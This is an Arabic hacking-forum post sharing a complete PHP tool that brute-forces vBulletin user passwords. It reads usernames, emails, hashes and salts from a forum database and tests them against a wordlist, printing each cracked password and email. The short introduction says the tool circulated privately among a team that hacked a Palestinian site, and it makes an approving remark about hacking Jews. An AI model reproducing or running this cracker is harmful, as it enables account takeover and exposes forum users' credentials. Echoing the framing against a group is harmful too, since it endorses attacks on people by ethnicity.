:: vBspiders Professional Network :: - اداه لتخمين باسورد ويوزر نيم قاعده بيانات vb

الشعار دائما نو برايفت

احد المواقع الفلسطينيه وجدته مخترق من قبل هكر منتمي لموقع فلسطيني

نعلمههم الاختراق حتى يخترقو مواقع فلسطينيه

ابداع والله لهم حسنات حاسسهم يخترقو يهود

وهي اداه لهم انتشرت بين فريقهم على اساس انها priv8

تفضلو
كود PHP:
   

<?php
/*
@////////////////////////////////////////////////////////////////////////
@//    Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8     //
@//    Priv8   _!_ VBulletin Brute Force By : _!_   Priv8     //
@//    Priv8            Programmed And Coded                 Priv8     //
@//  All Copyrights Are Reserved To _!_  And  _!__!_  //
@//    Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8 Priv8     //
@////////////////////////////////////////////////////////////////////////
*/

/*
@
@ Edit these info or just leave Them
@ And Edit Them in the Form
@ When you Run This Script
@
*/

$dbserver = 'localhost';     // Database Server
$dbuser   = 'username';      // Database Username
$dbpass   = 'password';      // Database Password
$dbname   = 'dbname';        // Database Name
$table    = 'user';          // Users Table name
$perpage  = '20';            // Number Of Users To Try Per Once
$filename = 'wordlist.txt';  // Word List File


/*
@//
@//      Dont Touch Any Thing Below
@//          Dont Try To Edit
@//  One Line May Cause Uncountable Errors
@//
*/

@error_reporting(0);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);

$users=array();


Echo "<html>
<head>
<meta name='GENERATOR' content='SoQoR.NeT Team'>
<meta ***********='Content-Type' content='text/html; charset=windows-1256'>
<meta ***********='Content-Language' content='ar-sa'>
<title>SoQoR Vbulletin Brute Force V 1.0 - WwW.SoQoR.NeT</title>
</head>
<style type='text/css'>
body
{
         background:#EBE9ED;
         color:#5E5B5B;
         font-size:12px;
         font-family:Verdana;
}
a
{
         color:#4d6d91;
}
a:link
{
         color:#4d6d91;
         text-decoration:none;
}
a:visited
{
         color:#4d6d91;
         text-decoration:none;
}
a:hover
{
         color:#7B7777;
         text-decoration:underline;
}
#contentpage
{
         background:#F4F4F4;
         color:#6E6E6E;
        width: 95%;
        border: 1px solid #6E6E6E;
        margin: auto auto;
        padding: 20px;
                 font-size:12px;
                 font-weight:bold;
}
.border
{
        border: 1px solid #6E6E6E;
}
.head
{
         background:#c0c0c0;
         color:#000;
}
.td
{
         background:#E8E8E8;
         color:#000;
}
input, textarea, select
{
border-top-width : 1px;
border-right-width : 1px;
border-bottom-width : 1px;
border-left-width : 1px;
}
input { text-indent : 2px; }</style>
<body width='100%' align=center>
<table align=center style='background:#F4F4F4;color:#6E6E6E;width: 95%;border: 1px solid #6E6E6E;margin: auto auto;font-size:12px;font-weight:bold;'><tr><td><center><b><h2>SoQoR Vbulletin Brute Force V 1.0</h2></b></center></td></tr></table>
<br>
<table id='contentpage' align='center'>
<tr>
<td>
";
if($_GET['start']==1)
{

if($_POST['post']>0)
{
$dbserver = $_POST['dbserver'];
$dbuser   = $_POST['dbuser'];
$dbpass   = $_POST['dbpass'];
$dbname   = $_POST['dbname'];
$table    = $_POST['table'];
$perpage  = $_POST['perpage'];
$filename = $_POST['filename'];
}
if($_GET['info']>0)
{
$dbserver = $_GET['dbserver'];
$dbuser   = $_GET['dbuser'];
$dbpass   = $_GET['dbpass'];
$dbname   = $_GET['dbname'];
$table    = $_GET['table'];
$perpage  = $_GET['perpage'];
$filename = $_GET['filename'];
}

$connect=mysql_connect($dbserver, $dbuser, $dbpass)or die (mysql_error());
         mysql_select_db($dbname, $connect) or die (mysql_error());

$num      = getnum();
$page     = intval($_GET['page'])?$_GET['page']:1;
$start    = ($page*$perpage)-$perpage;
$comma    = '';

$ff = check_passwd(cache());
if(!$ff)
{
 Echo "<h1>Ops Nothing Found This Time .. Try To Find Better Words List</h1>";
}

   $ps=ceil($num/$perpage);

 if($page == $ps)
 {
   Echo "<center><h1> All Done .. !! </h1></center>";
 }
 else
 {

   $next=$page+1;

   Echo "</td>
          </tr>
   </table>
   <br>

   <table align=center style='background:#F4F4F4;color:#6E6E6E;width: 95%;border: 1px solid #6E6E6E;margin: auto auto;font-size:12px;font-weight:bold;'>
          <tr>
                 <td align='center'><a href='$PHP_SELF?start=1&info=1&dbname=$dbname&dbpass=$dbpass&dbserver=$dbserver&table=$table&filename=$filename&dbuser=$dbuser&perpage=$perpage&page=$next'>NextPage($next) </a> Of ($ps) </form>";
 }

}
else
{
Echo "<center><form name='start' method='post' action='$PHP_SELF?start=1'>
<input type='hidden' name='post' value='1'>
<table class='border' border=0 width='400' cellpadding='6' cellspacing='1' align='enter'>
<tr class='head'>
<td colspan='2'>Enter Required Informations</td>
</tr>
<tr class='td'>
<td>Database Server</td>
<td><input type='text' name='dbserver' value='$dbserver'></td>
</tr>
<tr class='td'>
<td>Database User</td>
<td><input type='text' name='dbuser' value='$dbuser'></td>
</tr>
<tr class='td'>
<td>Database Password</td>
<td><input type='text' name='dbpass' value='$dbpass'></td>
</tr>
<tr class='td'>
<td>Database Name</td>
<td><input type='text' name='dbname' value='$dbname'></td>
</tr>
<tr class='td'>
<td>Table For Users</td>
<td><input type='text' name='table' value='$table'></td>
</tr>
<tr class='td'>
<td>Trys Per Page</td>
<td><input type='text' name='perpage' value='$perpage'></td>
</tr>
<tr>
<tr class='td'>
<td>Passwords List File</td>
<td><input type='text' name='filename' value='$filename'></td>
</tr>
<tr class='head'>
<td align='center'><input type='Submit' Value='Start'></td>
<td align='center'><input type='reset' value='ReSet'></td>
</tr>
</table>
</form></center>";

}
Echo "
</td>
</tr>
</table>
<br>
<table align=center style='background:#F4F4F4;color:#6E6E6E;width: 95%;border: 1px solid #6E6E6E;margin: auto auto;font-size:12px;font-weight:bold;'>
       <tr>

              <td align='center'>
                  Copyright &copy; Is reserved to : <a href='mailto:security@soqor.net'>HACKERS PAL</a>
                  <br>
                  SoQoR VBulletin Brute Force V 1.0 By <a href='http://www.soqor.net'>SoQoR.NeT</a> Team
              </td>
       </tr>
</table>
</body>
</html>";
function getnum()
{
   global $table;
      $query = mysql_query("Select * from $table") or die("$Table is not existed !!");

   return mysql_num_rows($query);
}

function cache()
{
   GLOBAL $table,$start,$perpage;

   $users=array();
   $query = mysql_query("Select * from $table order by userid asc limit $start,$perpage") or die("$Table is not existed !!");
   while($user = mysql_fetch_array($query))
   {
     $users[$user[username]] = array('user' => $user['username'],
                                     'pass' => $user['password'],
                                     'email'=> $user['email'],
                                     'salt' => $user['salt']);
   }

   return $users;
}

function check_passwd($users)
{
   global $filename;
   $found=false;
$cons=file_get_contents($filename);
$pass_ar=explode("\n",$cons);
    for($i=0;$i<count($pass_ar);$i++)
    {
      foreach($users as $key => $array)
      {
        if(md5(md5(trim($pass_ar[$i])).$array['salt'])==$array['pass'])
        {
          Echo "Found ($array[user]) With Password : (".trim($pass_ar[$i]).") Email ($array[email]) .. !!<br>";
          $found=1;
        }
      }
    }

    return $found;
}
?>
فلسطينفلسطينفلسطينفلسطينفلسطين
smilies9